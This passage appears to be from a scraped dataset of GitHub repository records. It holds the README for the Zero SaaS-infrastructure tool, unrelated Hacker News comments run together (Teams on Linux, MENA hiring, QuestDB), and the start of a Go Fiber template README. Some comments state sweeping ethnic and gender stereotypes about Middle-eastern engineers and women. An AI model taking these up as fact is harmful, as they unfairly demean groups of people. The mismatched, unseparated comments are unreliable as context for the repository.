Card](https://goreportcard.com/badge/commitdev/zero)](https://goreportcard.com/report/commitdev/zero)\n[![Slack](https://img.shields.io/badge/slack-join-brightgreen?logo=slack&style=social)](https://slack.getzero.dev)\n\n

\n \n

\n\n## What is Zero\n\nZero is an open source tool which makes it quick and easy for startup technical founders and developers to build everything they need to launch and grow high-quality SaaS applications faster and more cost-effectively.\n\nZero sets up everything you need so you can immediately start building your product.\n\nZero was created by [Commit](https://commit.dev).\n## Why is Zero good for startups\n\nAs a technical founder or the first technical hire at a startup, your sole focus is to build the logic for your application and get it into customers\u2019 hands as quickly and reliably as possible. Yet you immediately face multiple hurdles before even writing the first line of code. You\u2019re forced to make many tech trade-offs, leading to decision fatigue. You waste countless hours building boilerplate SaaS features not adding direct value to your customers. You spend precious time picking up unfamiliar tech, make wrong choices that result in costly refactoring or rebuilding in the future, and are unaware of tools and best practices that would speed up your product iteration.\n\nZero was built by a team of engineers with many years of experience in building and scaling startups. We have faced all the problems you will and want to provide a way for new startups to avoid all those pitfalls. We also want to help you learn about the tech choices we made so your team can become proficient in some of the great tools we have included. The system you get starts small but allows you to scale well into the future when you need to.\n\nEverything built by Zero is yours. After using Zero to generate your infrastructure, backend, and frontend, all the code is checked into your source control repositories and becomes the basis for your new system. We provide constant updates and new modules that you can pull in on an ongoing basis, but you can also feel free to customize as much as you like with no strings attached. If you do happen to make a change to core functionality and feel like contributing it back to the project, we'd love that too!\n\nIt's easy to get started, the only thing you'll need is an AWS account. Just enter your AWS CLI tokens or choose your existing profile during the setup process and everything is built for you automatically using infrastructure-as-code so you can see exactly what's happening and easily modify it if necessary.\n\n[Read about the day-to-day experience of using a system set up using Zero](https://getzero.dev/docs/zero/about/real-world-usage)\n\n\n## Why is Zero Reliable, Scalable, Performant, and Secure\n\nReliability: Your infrastructure will be set up in multiple availability zones making it highly available and fault tolerant. All production workloads will run with multiple instances by default, using AWS ELB and Nginx to load balance traffic. All infrastructure is represented with code using [HashiCorp Terraform][terraform] so your environments are reproducible, auditable, and easy to configure.\n\nScalability: Your services will be running in Kubernetes, with the EKS nodes running in an AWS [Auto Scaling Group][asg]. Both the application workloads and cluster size are ready to scale whenever the need arises. Your frontend assets will be stored in S3 and served from AWS' Cloudfront CDN which operates at global scale.\n\nSecurity: Properly configured access-control to resources/security groups, using secret storage systems (AWS Secret Manager, Kubernetes secrets), and following best practices provides great security out of the box. Our practices are built on top of multiple security audits and penetration tests. Automatic certificate management using [Let's Encrypt][letsencrypt], database encryption, VPN support, and more means your traffic will always be encrypted. Built-in application features like user authentication help you bullet-proof your application by using existing, tested tools rather than reinventing the wheel when it comes to features like user management and auth.\n\n\n## What do you get out of the box?\n[Read about why we made these technology choices and where they are most applicable.](https://getzero.dev/docs/zero/about/technology-choices)\n\n[Check out some resources for learning more about these technologies.](https://getzero.dev/docs/zero/reference/learning-resources)\n\n### Infrastructure\n- Fully configured infrastructure-as-code AWS environment including:\n - VPCs per environment (staging, production) with pre-configured subnets, security groups, etc.\n - EKS Kubernetes cluster per environment, pre-configured with helpful tools like cert-manager, external-dns, nginx-ingress-controller\n - RDS database for your application (Postgres or MySQL)\n - S3 buckets and Cloudfront distributions to serve your assets\n- Logging and Metrics collected automatically using either Cloudwatch or Prometheus + Grafana, Elasticsearch + Kibana\n- VPN using [Wireguard][wireguard] (Optional)\n- User management and Identity / Access Proxy using Ory [Kratos][kratos] and [Oathkeeper][oathkeeper] (Optional)\n- Tooling to make it easy to set up secure access for your dev team\n- Local/Cloud Hybrid developer environment using Telepresence (Optional)\n\n### Backend\n- Golang or Node.js example project automatically set up, Dockerized, and deployed to your new Kubernetes cluster\n- CI pipeline built with [CircleCI][circleci] or GitHub Actions. Just merge a PR and a deploy will start. Your code will be built and tested, deployed to staging, then prompt you to push to production\n- File upload / download support using signed Cloudfront URLs (Optional)\n- Email support using [SendGrid][sendgrid] or AWS SES (Optional)\n- Notification support for sending and receiving messages in your application (web, mobile, SMS, Email, etc.) (Optional) (In Progress)\n- User management integration with Kratos and Oathkeeper - No need to handle login, signup, authentication yourself (Optional)\n\n### Frontend\n- React example project automatically set up, deployed and served securely to your customers\n- CI pipeline built with CircleCI or GitHub Actions. Just merge a PR and a deploy will start. Your code will be built and tested, deployed to staging, then prompt you to push to production\n- File upload / download support using signed Cloudfront URLs (Optional)\n- User management integration with Kratos - Just style the example login / signup flow to look the way you want (Optional)\n- Static site example project using Gatsby to easily make a landing page, also set up with a CI Pipeline using CircleCI (Optional)\n\n___\n\n## Getting Started\n\n[See the getting started guide at the Zero docs site.](https://getzero.dev/docs/zero/getting-started/installation)\n\n### Building blocks of Zero\n\n### Project Definition:\nEach project is defined by this project definition file, this manifest contains your project details, and is the source of truth for the templating(`zero create`) and provision(`zero apply`) steps.\n\nSee [`zero-project.yml` reference](https://getzero.dev/docs/zero/reference/project-definition) for details.\n### Module Definition\nModule definition defines the information needed for the module to run (`zero apply`).\nAlso declares dependency used to determine the order of execution with other modules.\n\nSee [`zero-module.yml` reference](https://getzero.dev/docs/zero/reference/module-definition) for details.\n___\n\n\n## Zero Default Stack\n\n[System Architecture Diagram](https://raw.githubusercontent.com/commitdev/zero-aws-eks-stack/main/docs/architecture-overview.svg)\n\nThe core zero modules currently available are:\n| Project | URL |\n|---|---|\n| AWS Infrastructure | [https://github.com/commitdev/zero-aws-eks-stack](https://github.com/commitdev/zero-aws-eks-stack) |\n| Backend (Go) | [https://github.com/commitdev/zero-backend-go](https://github.com/commitdev/zero-backend-go) |\n| Backend (Node.js) | [https://github.com/commitdev/zero-backend-node](https://github.com/commitdev/zero-backend-node) |\n| Frontend (React) | [https://github.com/commitdev/zero-frontend-react](https://github.com/commitdev/zero-frontend-react) |\n| Static Site (Gatsby) | [https://github.com/commitdev/zero-static-site-gatsby](https://github.com/commitdev/zero-static-site-gatsby) |\n\n___\n\n## Contributing to Zero\n\nZero welcomes collaboration from the community; you can open new issues in our GitHub repo, Submit PRs' for bug fixes or browse through the tickets currently open to see what you can contribute too.\n\nWe use Zenhub to show us the entire project across all repositories, so if you are interested in seeing that or participating, you can can [check out our workspace](https://app.zenhub.com/workspaces/commit-zero-5da8decc7046a60001c6db44/board?repos=203630543,247773730,257676371,258369081,291818252,293942410,285931648,317656612)\n\n### Building the tool\n\n```shell\n$ git clone git@github.com:commitdev/zero.git\n$ cd zero && make build\n```\n\n### Running the tool locally\n\nTo install the CLI into your GOPATH and test it, run:\n\n```shell\n$ make install-go\n$ zero --help\n```\n\n### Releasing a new version on GitHub and Brew\n\nWe are using a tool called `goreleaser` which you can get from brew if you're on MacOS:\n`brew install goreleaser`\n\nAfter you have the tool, you can follow these steps:\n```\nexport GITHUB_TOKEN=\ngit tag -s -a -m \"Some message about this release\"\ngit push origin \ngoreleaser release\n```\n\nThis will create a new release in GitHub and automatically collect all the commits since the last release into a changelog.\nIt will also build binaries for various OSes and attach them to the release and push them to brew.\nThe configuration for goreleaser is in [.goreleaser.yml](.goreleaser.yml)\n\n\n___\n## FAQ\n\nWhy is my deployed application not yet accessible?\n\n- It takes about 20 - 35 mins for your deployed application to be globally available through AWS CloudFront CDN.\n\n\n[acw]: https://aws.amazon.com/cloudwatch/\n[vpc]: https://aws.amazon.com/vpc/\n[iam]: https://aws.amazon.com/iam/\n[asg]: https://aws.amazon.com/autoscaling/\n[zero binary]: https://github.com/commitdev/zero/releases/\n[and more]: https://github.com/commitdev/zero-aws-eks-stack/blob/master/docs/resources.md\n[terraform]: https://terraform.io\n[letsencrypt]: https://letsencrypt.org/\n[kratos]: https://www.ory.sh/kratos/\n[oathkeeper]: https://www.ory.sh/oathkeeper/\n[wireguard]: https://wireguard.com/\n[circleci]: https://circleci.com/\n[sendgrid]: https://sendgrid.com/\n[launchdarkly]: https://launchdarkly.com/\n", "readme_type": "markdown", "hn_comments": "I kind of like the idea, but feel like there would end up being some bad unexpected consequences. On the other hand, we have lots of that now too :(What horrible software... I switched to running Teams in Edge on Linux awhile ago to get camera blur and it's just as bad as the native client was...Disclaimer: I'm currently part of Tandem.Building a multi platform video conferencing app that is also stable and performant is extremely challenging. I can understand Microsoft's decision. That said, it's unfortunate that Linux users aren't going to have access to a desktop client anymore.If you're looking for a new video conferencing tool, check out www.tandem.chat. We support linux/mac/windows (along with a web app) and we're built from the ground up for hybrid and remote first teams.We're happy to extend an HN discount to any interested teams or answer any questions. Just email me at akash@tandem.chat.If this web app is less of a resource hog than the Teams app on the Mac, I'll switch to it in a heartbeat. Between Teams and Outlook, M$ consumes over one GB of my mac's RAM. If a browser's memory footprint grows by less than that when running those apps (unavoidable, where I work), that'd be a big win over the current status quo, IMHO.Teams has been transformative in the way I work with my team over the last few years, and the pace of development is impressive.But\u2026I cannot understand the absence of core functionality like copy & paste from chats. You can select a few messages (maybe a pageful) but there is no way to take a copy of a whole chat. You can\u2019t print it. You can\u2019t export it. Eventually it just gets lost in deep history, and you can only find it if you remember which keywords were in the text.We resort to filing screenshots, which seems ridiculous.There used to be dozens of threads on UserVoice crying out for this feature, but they all got wiped when the Teams team stopped using that. At the time the statement was \u201cthis is on our backlog\u201d and it had been that way for several years.I\u2019d love an explanation of why.To be fair, I would much prefer a sandboxed webapp then giving Microsoft full access to my system.Wait. \nI have two different team accounts, and you can switch from the app itself but it takes time and you don't receive notifications from the unused account, which makes it useless.\nI also don't have it as a web tab because there are issues with calls and sharing screens this way.So instead I have two team apps installed. One from flatpack and the other from the gnome store (or something like that, don't remember the exact stores).\nAnd they work great! Well, they work as awful as the teams app work, but simultaneously without any issue at all.With the PWA can you have multiple independent instances? Please tell me yes...I'm surprised they didn't say \"why don't you just use Windows with WSL? We're trying our best to make sure your IT department forbids you from using anything else anyway\"I had to switch over to running Teams in Edge because it was barely functional otherwise. The only thing I run on edge though is Teams so really barely a change for me.Teams is a cancer. It is the worst windows program i ever worked with.The Teams webapp is by far the slowest and most buggy of any video chat solution clients have asked me to use.In one browser my mic works, but I cannot see screens shared by other people. In another browser it is the reverse. Also it is designed for WebGL which is not available on my OS and the software fallback takes 30 seconds to load and is slow as hell on a beefy 32 core Threadripper.Jitsi, Meet, and others work flawlessly by comparison.Corp propaganda. No one wants extra features. We want basic features working. Client is a hot mess.What's the source for this story please?will it be able to show more than 4 others in a video chat at once? which seems to be another strange limitation of the Linux \"teams\" client.Lots of vitriol in this thread. Wow.I'm grateful that Microsoft is giving Linux desktop a shot. Thanks for remembering us! (No sarcasm. I'm really impressed at how well Office works in Firefox-Linux.)Good, the current client auto starts on boot even though I'm not signed in. I've got to close 3 windows to get the thing to go away every time.This is a load of bull crap from MS (I am fine with a PWA though). Teams is built atop electron. They purposefully kept the Linux version crappy for some reason. Possibly because, if they do one app for Linux, they might have to make other apps as well. Microsoft loves Linux my ass.Good riddance. Can microsoft retire windows and mac apps now as well, please?Seriously, I see zero point of shipping old/buggy chrome bundled with the app (aka \"electron\") for purpose of accessing some centralized service. PWA is the way to go here, yes.Please, for the love of all that is pure, just make Teams a native Windows app instead of this Chromium/Electron crap that feels out of place on any platform, not to mention being dog slow.And please leave Outlook alone. Don't even think about turning it into a junky cross platform web-ish app.Frankly, I'd prefer things like this. After the Zoom security issues came to light, I'd much prefer web apps over native apps, assuming the web apps can be made to be performant on Firefox. The fewer closed-source programs running on my computer, the better.I have used https://github.com/IsmaelMartinez/teams-for-linux before, it is quite a nice experience (better than the official app!) and it might be something suitable when the web client is broken with no clear reason why.(self-promotion ahead)Since the Microsoft Teams client is well known for being quite frankly, terrible, as many have pointed out in this thread, I am working on my own, alternative Teams client: OperCom.I'm building it as a simple, vanilla JS web application, in a SaaS model (since I need to keep bending to Microsoft's will). The Teams API isn't great to reverse engineer, but it's do-able and has been done (partially) before, but never to the extent required to create a full-featured app.If anybody's interested, you can see its current status at [1] and keep updated with its progress at [2].[1] https://blog.opercom.co.uk/posts/news-13-08-22/\n[2] https://www.opercom.co.uk/contactArg.As many issues as the Linux version had, using the web version was worse.I guess I shouldn't have expected from to actually follow throughon Teams for Linux.Microsoft Teams is one of the worst desktop apps I've used - on Windows and Mac.You can see how it's built on layers and layers of badly designed compatibility layers and bad engineering decisions.Massive CPU hog, unacceptable side effects (disconnecting Bluetooth devices), super laggy UI and overall poor UX are the headlines.I decided to invest in an alternative VC platform for my business because it was that bad.Oh no, how terrible.Anyway.(It never even worked)What will happen to the Ubuntu snap package, will it be update to a web-app?Interesting decision to shut the software down before the replacement is available to be downloaded.Disappointing to say the leastNo matter what Linux setup I've had over the last years, at some point either my webcam or sound input/output will break. Either permanently from an update or randomly during meetings. Restarting the apps and possibly reconnecting the hardware usually fixes it, maybe a restart.There's this uncertainty that's big enough for me to stick to a Macbook when working.> We hear from you that you want the full richness of Microsoft Teams features on Linux such as background effects, reactions, gallery viewHum... As a Windows Teams user, can you remove those features from the Windows client too?> We hear from you that you want the full richness of Microsoft Teams features on Linux such as background effects, reactions, gallery view, etc.Just to be clear, we don't want any of your shit, let alone the full shit.Not even just an electron Linux app?Is there a link to an official announcement? I can't seem to find one.Hopefully this means it stops prompting me to open links to other channels or comments via xdg-open'ing the desktop app, with no way to make it default to opening them in the website instead.Anyone know if Firefox will be allowed for calls before this switch, or will I still be limited to chrome(ium) browsers?Manara sounds like a beacon of light for the MENA engineers!Congrats to you Laila and Iliana for the launch and I will definitely be sharing this with fellow Tunisian developers :)Just wanted to chime in to share that the original post is great but doesn't do enough justice to the talent. I've been working as an engineer in the Bay Area for 3+ years and found Manara about a year ago. During that time, I've closely mentored 6 engineers and mock interviewed several more. I think nearly every end-of-program mock interview I've given to Manara students are a \"Hire\" with questions of similar difficulty to those used at the big tech company I work for. Having gotten to know them very well now, it's clear to me that these really are a selection of the best engineers in the region (e.g. top performers in competitive programming competitions, hackers with more side projects than university projects, etc).P.S. Also worth mentioning that this is some of the most exciting volunteer work I've done...it's a small part of what I do each week but it keeps me disproportionately energized even throughout the rest of my week!There's a big caveat here: Middle-eastern engineers will have significant problems working with more liberal/woke companies. They have a strong tendency to be homophobic/transphobic/misogynist.Last year I fired an off-shored team of 10 otherwise excellent Egyptian engineers because their homophobic statements on LinkedIn and in Slack made people in the company uncomfortable.If your company's engineers lean more right-wing/republican, then middle-eastern engineers are probably a great untapped resource. If your company is more of a Silicon Valley company, they are a liability which can get you sued.Did u consider working with Israelis? I know it sounds far fetched but I'm sure many companies wouldn't rule out hiring Gazans remotely. Whether they can do so legally is another question, probably not.Sounds like a terrific idea. I saw the growth of this sort of thing in Argentina and other South American countries once some companies started investing time and money there. A fair amount of the popularity was attributed to sharing highly overlapping time zones with the US. I imagine this has a similar advantage for European customers.You may get some mileage out of talking with Globant (https://globant.com) or a similar company in South America to hear what their experience was. They have a different model, but do a lot of the same things you've outlined.At Repl.it, we interviewed interns via Manara and was mind-blown by the quality. We've given offers to two and I know at least one will be joining us soon. I think Manara has a potential to transform the global developer market. Very excited for them!Hi, Laila. Congratulations on the launch. I'll share this (Algiers, Algeria).One of the problems people here have is getting paid from companies abroad. I think it would be good to conduct interviews with people who may be having the same problem, and either offer a solution or explain it on the website. Many people work as freelancers, and the way they get their money is Herculean.Also, many, especially here, neither are Arab nor identify as such [native population and ethnicity before 7th century invasions]. Many also do not share the language or other common attributes. Therefore, if you're not ethnicity based, but based on the \"region\", I guess North Africa, and Middle East are the terms that would work better.Again, congratulations. There a lot of very talented people in these countries who will not work abroad for different reasons. Staying not to leave family behind is a very, very, common reason. Making remote work easier for them, whether positions or ease of payment, is huge.This is encouraging even for those who are willing to move but aren't invited to because they haven't reached the skill level required for an employer to incur that cost, and they haven't reached the financial level to incur that cost themselves. I guess your product hits that niche as well.Oh, wonderful!How I wish this works for Africa as well.Here in Africa (Nigeria) to get a good tech job can take like forever... I am so happy you're helping out. Cudos!Hey, thanks for sharing your amazing journey! Whats the best way to contact you?Hey Laila,Congratulations on the launch. Your story is great and I love the premise. I myself am the Founder, CEO + CTO of a medical education company working on revolutionizing the future of meded-tech in MENA, so in the near future I'll be looking into hiring from your platform.Be well and good luck!AzibWasalaam ukhti, from the other side of the fence. I'm in Israel, and would love to learn more, and see how I can help from here. It could be one of our small steps that helps move the needle on peace!I'd like to introduce you to some friends in North America who will be very interested. Please check out my profile for an e-mail, and let's talk.Shukraan habibti!It seems like there is correlation between patriarchal societies and having more women developers. I wonder why, maybe because anyway the society is patriarchal so there is not much difference between this field to others unlike in the west where all misogynist white males concentrate in this profession and all the good guys go to law or acting or wherever there are many women and everything is equal and rosy. But then you have to wonder why would those Arab women want to move to a horrible place like the western tech industry instead of removing their shackles and becoming a nurse in a hospital or work in HR of a big corporation, the places where women feel comfortable and equal in the west. It is a bit of a mystery.Speaking from the employer side, can you possibly mention some salary levels?\nI know the topic is sensitive and difficult, but giving some indication here or on the website would be great. This is hopefully competitive with other low-cost locations for react//dashboards/enterprise-java etcSo in the past I read something similar. It's similar business but for Africa: https://techcrunch.com/2019/01/23/connecting-african-softwar...Then something similar showed up again. But this time the business is for Europe, Asia and Latin America: https://techcrunch.com/2018/05/23/youteam/Then I joked with my friend: \"Maybe you should build something similar but for South-East Asia.\" (We live in SEA.)Then the similar business showed up again today but for Middle East and North America. So I guess it's about time when something similar shows up but for SEA (or other parts of the world). :)Great initiative Laila!Interesting that the proportion of female CS students is so high in those countries, I imagine it's more like 10% in most Western countries. Based on you inside perspective, do you have any theories about why this is so?Anecdotally, I've worked for a lot of startups in Scandinavia, and one in Jordan, and that one had the most women!Keeping you guys in mind the next time someone asks me for MENA talent. And if I want to hire some myself!Congrats on the launch, Laila and Iliana!Quick question: why are the companies with on-site jobs restricted to Europe and Canada (if they are in fact restricted)?Thanks!I love this because it empowers people in the MENA region to establish financial security and grow their careers at global tech companies. This will hopefully unlock resources for the much-needed entrepreneurship growth in the regionOh man, the name is unfortunate. It's slang for \"babe\" (for girls) in Greek. Also the last name of one of the most famous erotic comic artists (Milo Manara). Fun times!In case any of the people you are working with are interested in open source, please direct them at FOSSjobs and our resources wiki page:https://www.fossjobs.net/\nhttps://github.com/fossjobs/fossjobs/wiki/ResourcesIt reminds me of the time that a \"committee\" of Vikings decided to name Iceland \"Iceland\" even though Greenland is much icier. Damn near got 'em!Anachronistic, comically out of date, and in this day and age, repellent? That a boy cannot be called \"Sue\" strikes an American as a fundamental attack on personal rights.Has there been a string of Iceland articles recently, or am I suffering from recency illusion?My context: https://en.wikipedia.org/wiki/GIUK_gapWhat are some names that were rejected?Do you measure performance vs k/shakti?> https://news.ycombinator.com/item?id=22803504As I already said or rather asked there: Assume I already use Clickhouse for example. What are the benefits of QuestDB? Why should I use it instead?Surely it's a good tech and competition is key. But what are the key points that should make me look into it? There is a lot of story about the making and such, but I don't see the \"selling point\".This looks great, but more importantly good luck! There seems to be market need for this and it looks a solid implementation at first glance. You're off to a good start. I hope you and your team are successful!Congrats! I've been looking for a time series database but most of them seems to be in-memory nosql databases. QuestDB might be exactly what I need. I'll definitely give it a try soon!Testing out the demo:SELECT * FROM trips\nWHERE tip_amount > 500\nORDER BY tip_amount DESCVery interesting :-)https://try.questdb.io:9000/ is downThis is great! Quick question: would you mind sharing why you went with Java vs something perhaps more performant like all C/C++ or Rust? I'd suspect language familiarity (which is 100% ok).Hi Vlad - your anecdote about ship tracking is interesting (my other startup is an AIS based dry freight trader). You must know the Vortexa guys given your BP background.How does QuestDB differ from other timeseries/OLAP offerings? I'm not entirely clear.How does your performance compare to Atlas? [0][0] https://github.com/Netflix/atlasI'm curious how QuestDB handles dimensions. OLAP support with reasonably large number of dimensions and cardinality in the range of at least thousands is a must for modern-day time series database. Otherwise, what we get is only incremental improvement to Graphite -- a darling among startups, I understand, but a non-scalable extremely hard to use timeseries database nonetheless.A common flaw I see in many time-series DBs is that they store one time series per combination of dimensions. As a result, any aggregation will result in scanning of potentially millions of time series. If any time-series DB claims that it is backed up by a key-value store, say, Cassandra, then the DB will have the aforementioned issue. For instance, Uber's M3 used to be backed up by Cassandra, and therefore would give this mysterious warning that an aggregation function exceeded the quota of 10,000 time series, even though from user's point of view the function dealt with a single time series with a number of dimensions.Impressive. Can we talk?Awesome!\nCould you share a bit about business model?I am still hoping to see comparisons to Victoria Metrics, which also shows much better performance than many other TSDB. Victoria Metrics is Prometheus compatible whereas Quest now supports Postgres compatibility. Both have compatibility with InfluxDB.The Victoria Metrics story is somewhat similar where someone tried using Clickhouse for large time series data at work and was astonished at how much faster it was. He then made a reimplementation customized for time series data and the Prometheus ecosystem.Can you add a tldr?Any plans on integration with Apache Arrow?The database aside entirely, that story was a really fun read. Thanks for writing it up and sharing. Rooting for you!Stories like these help a product to get traction. Every founder/creator must come up with a story related to the product.Congrats!I see this as a very interesting project. I use ClickHouse as OLAP and I'm very happy with it.\nI can tell you features that make me stick to it. If some day QuestDB offers them, I might explore the possibility to switch but never before.\n- very fast (I guess we're aligned here)\n- real time materialized views for aggregation functions (this is absolutely a killer feature that makes it quite pointless to be fast if you don't have it)\n- data warehouse features: I can join different data sources in one query. This allows me to join, for instance, my MySQL/MariaDB domain dB with it and produce very complete reports.\n- Grafana plugin\n- very easy to share/scale at table level\n- huge set of functions, from geo to URL, from ML to string manipulation\n- dictionaries: I can load maxdb geo dB and do real time localisation in queries\nI might add some more once they come to my mind.\nHaving said this, good job!!!Loved the story and the product!Can you talk about some of the ideal use cases for a time series db? Versus Postgres or a graph database.There's an opportunity for a tool that combines this sort of technology in the backend with a spreadsheet-like GUI powered by formulas and all the user friendliness that comes with a non-programmer interface. Wall Street would forever be changed. Source: I'm one of the poor souls fighting my CPU and RAM to do the same thing with Excel and non-native add-ins by {FactSet, Capital IQ, Bloomberg}This stuff SELECT * FROM balances\n LATEST BY balance_ccy, cust_id\n WHERE timestamp <= '2020-04-22T16:15:00.000Z'\n AND NOT inactive;\n\nMakes me literally want to cry for knowing what is possible yet not being able to do this on my day job :(Congrats on the launch!One question, there are many open source database startups that make it easy to scale on the cloud. However, when you look into the offering, the scaling part is never actually open source and you end up paying for non open source stuff just like any other proprietary database. So I guess my question is, are you planning to go open core too or will you remain open source with some SaaS offering? Good luck to you!Amazing story and congrats on all the progress!Shameless plug: if you'd like to try it out in a production setting, we just created a one-click install for it:https://github.com/render-examples/questdbYour story is very inspiring. I wish you all the best with this project.I noticed there is \"Clustering\" mentioned under enterprise features, but I can't seem to find any references to it in the documentation. Is this something that will be strictly closed source?https://questdb.io/docs/crudOperations \nHas js errors and is not loading/page not foundCongratulations on launching! It looks like a great product. Some technical questions which I didn\u2019t see answered on my first glance:(1) Is it a single-server only, or is it possible to store data replicated as well?(2) I\u2019m guessing that all the benchmarks were done with all the hot data paged into memory (correct?); what\u2019s the performance once you hit the disk? How much memory do you recommend running with?(3) How\u2019s the durability? How often do you write to disk? How do you take backups? Do you support streaming backups? How fast/slow/big are snapshot backups?Maybe I'm out of the loop, but I noticed lately that a majority of show/launch hn posts I click on have text that is muted. I know this happens on down voted comments, but is this saying that people are down voting the post itself?Absolutely love the story. TimescaleDB & InfluxDB have had a lot of posts on HN, so I'm sure others are wondering - how do we compare QuestDB to them? It sounds like performance is a big one, but I'm curious to hear your take on it.How do i join the slack group? It says to request invite from the workspace administrator?I find your story very interesting, thank you for sharing that.It also gives an interesting background as to why questdb is different than all the other competitors in the space.kudos @ launching, impressiveGood luck. I work on similar OS database engine for about decade now. It is not bad, but I think consulting is better way to get funds. Also avoid \"zero gc\", JVM can be surprisingly good.Will be in touch :)The SQL explorer at http://try.questdb.io:9000/ is pretty slick \u2013 was that built in-house, or is it based on something that's open-source?Am I the only one that's like \"wtf is a time-series database compared to a normal one?\"Congrats!Also thank you for your awesome blog[0]! It's really the kind of technical gem I enjoy reading late at night :)[0] https://questdb.io/bloggreat story! well done.How do you get the best performance out of QuestDB? Does it have to be on bare metal machines? Is there any performance benchmark of QuestDB running on bare metal vs. cloud instances (e.g. EC2 with EBS volumes) etc.?mmap'd databases are really quick to implement. I implemented both row and column orientated databases. The traders and quants loved it - and adoption took off after we built a web interface that let you see a whole day and also zoom into exact trades with 100ms load times for even the most heavily traded symbols.The benefits of mmaping and in general POSIX filesystem atomic properties are quick implementation, where you don't have to worry about buffer management. The filesystem and disk block remapping layer (in SSD or even HDDs now) are radically more efficient when data are given to them in contiguous large chunks. This is difficult to control with mmap where the OS may write out pages at its whim. However, even using advanced Linux system calls like mremap and fallocate, which try to improve the complexity of changing mappings and layout in the filesystem, eventually this lack of control over buffers will bite you.And then when you look at it, the kernel (with help from the processor TLB) has to maintain complex data-structures to represent the mappings and their dirty/clean states. Accessing memory is not O(1) even when it is in RAM. Making something better tuned to a database than the kernel page management is a significant hurdle but that's where there are opportunities.Does it supports some kind of compression ? That's very important when storing billions of events.Great story! Thanks for sharingsomething is off with your website. I just see images \nhttps://questdb.io/blog/2020/07/24/use-questdb-for-swag/Does postgres wire support mean QuestDB can be a drop-in replacement for a postgres database?Is this common?1. Does QuestDB support SQL sufficiently to run, say, the TPC-H analytics benchmark? (not a time series2. If so, can you give some performance figures for a single machine and reasonable scale factors (10 GB, 100 GB, 1000 GB)? Execution times for single queries are even more interesting than the overall random-queries-per-hour figure.3. Can you link to a widely-used benchmark for analytic workloads on time series, which one can use to compare performance of various DBMSes? With SQL-based queries preferably.Hi Vlad, this looks really interesting!I really enjoyed reading the backstory and the founding dynamics upon QuestDB was born and I think a lot of others in the YC community will as well.Can you give some use cases or specific examples of why QuestDB is unique?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "create-go-app/fiber-go-template", "link": "https://github.com/create-go-app/fiber-go-template", "tags": ["template-project", "golang-app-server", "golang", "api-server", "api-test", "create-go-app", "cgapp", "fiber", "backend-template", "docker", "fiber-backend-template", "swagger", "hacktoberfest", "hacktoberfest2021"], "stars": 531, "description": "\ud83d\udcdd Production-ready backend template with Fiber Go Web Framework for Create Go App CLI.", "lang": "Go", "repo_lang": "", "readme": "# Fiber backend template for [Create Go App CLI](https://github.com/create-go-app/cli)\n\n\"go \"go \"license\"\n\n[Fiber](https://gofiber.io/) is an Express.js inspired web framework build on top of Fasthttp, the fastest HTTP engine for Go. Designed to ease things up for **fast** development with **zero memory allocation** and **performance** in mind.\n\n## \u26a1\ufe0f Quick start\n\n1. Create a new project with Fiber:\n\n```bash\ncgapp create\n\n# Choose a backend framework:\n# net/http\n# > fiber\n# chi\n```\n\n2. Rename `.env.example` to `.env` and fill it with your environment values.\n3. Install [Docker](https://www.docker.com/get-started) and the following useful Go tools to your system:\n\n - [golang-migrate/migrate](https://github.com/golang-migrate/migrate#cli-usage) for apply migrations\n - [github.com/swaggo/swag](https://github.com/swaggo/swag) for auto-generating Swagger API docs\n - [github.com/securego/gosec](https://github.com/securego/gosec) for checking Go security issues\n - [github.com/go-critic/go-critic](https://github.com/go-critic/go-critic) for checking Go the best practice issues\n - [github.com/golangci/golangci-lint](https://github.com/golangci/golangci-lint) for checking Go linter issues\n\n4. Run project by this command:\n\n```bash\nmake docker.run\n```\n\n5. Go to API Docs page (Swagger): [127.0.0.1:5000/swagger/index.html](http://127.0.0.1:5000/swagger/index.html)\n\n![Screenshot](https://user-images.githubusercontent.com/11155743/112715187-07dab100-8ef0-11eb-97ea-68d34f2178f6.png)\n\n## \ud83d\udce6 Used packages\n\n| Name | Version | Type |\n| --------------------------------------------------------------------- | ---------- | ---------- |\n| [gofiber/fiber](https://github.com/gofiber/fiber) | `v2.41.0` | core |\n| [gofiber/jwt](https://github.com/gofiber/jwt) | `v2.2.7` | middleware |\n| [arsmn/fiber-swagger](https://github.com/arsmn/fiber-swagger) | `v2.31.1` | middleware |\n| [stretchr/testify](https://github.com/stretchr/testify) | `v1.7.1` | tests |\n| [golang-jwt/jwt](https://github.com/golang-jwt/jwt) | `v4.4.1` | auth |\n| [joho/godotenv](https://github.com/joho/godotenv) | `v1.4.0` | config |\n| [jmoiron/sqlx](https://github.com/jmoiron/sqlx) | `v1.3.5` | database |\n| [jackc/pgx](https://github.com/jackc/pgx) | `v4.16.1` | database |\n| [go-sql-driver/mysql](https://github.com/go-sql-driver/mysql) | `v1.6.0` | database |\n| [go-redis/redis](https://github.com/go-redis/redis) | `v8.11.5` | cache |\n| [swaggo/swag](https://github.com/swaggo/swag) | `v1.8.2` | utils |\n| [google/uuid](https://github.com/google/uuid) | `v1.3.0` | utils |\n| [go-playground/validator](https://github.com/go-playground/validator) | `v10.10.0` | utils |\n\n## \ud83d\uddc4 Template structure\n\n### ./app\n\n**Folder with business logic only**. This directory doesn't care about _what database driver you're using_ or _which caching solution your choose_ or any third-party things.\n\n- `./app/controllers` folder for functional controllers (used in routes)\n- `./app/models` folder for describe business models and methods of your project\n- `./app/queries` folder for describe queries for models of your project\n\n### ./docs\n\n**Folder with API Documentation**. This directory contains config files for auto-generated API Docs by Swagger.\n\n### ./pkg\n\n**Folder with project-specific functionality**. This directory contains all the project-specific code tailored only for your business use case, like _configs_, _middleware_, _routes_ or _utils_.\n\n- `./pkg/configs` folder for configuration functions\n- `./pkg/middleware` folder for add middleware (Fiber built-in and yours)\n- `./pkg/repository` folder for describe `const` of your project\n- `./pkg/routes` folder for describe routes of your project\n- `./pkg/utils` folder with utility functions (server starter, error checker, etc)\n\n### ./platform\n\n**Folder with platform-level logic**. This directory contains all the platform-level logic that will build up the actual project, like _setting up the database_ or _cache server instance_ and _storing migrations_.\n\n- `./platform/cache` folder with in-memory cache setup functions (by default, Redis)\n- `./platform/database` folder with database setup functions (by default, PostgreSQL)\n- `./platform/migrations` folder with migration files (used with [golang-migrate/migrate](https://github.com/golang-migrate/migrate) tool)\n\n## \u2699\ufe0f Configuration\n\n```ini\n# .env\n\n# Stage status to start server:\n# - \"dev\", for start server without graceful shutdown\n# - \"prod\", for start server with graceful shutdown\nSTAGE_STATUS=\"dev\"\n\n# Server 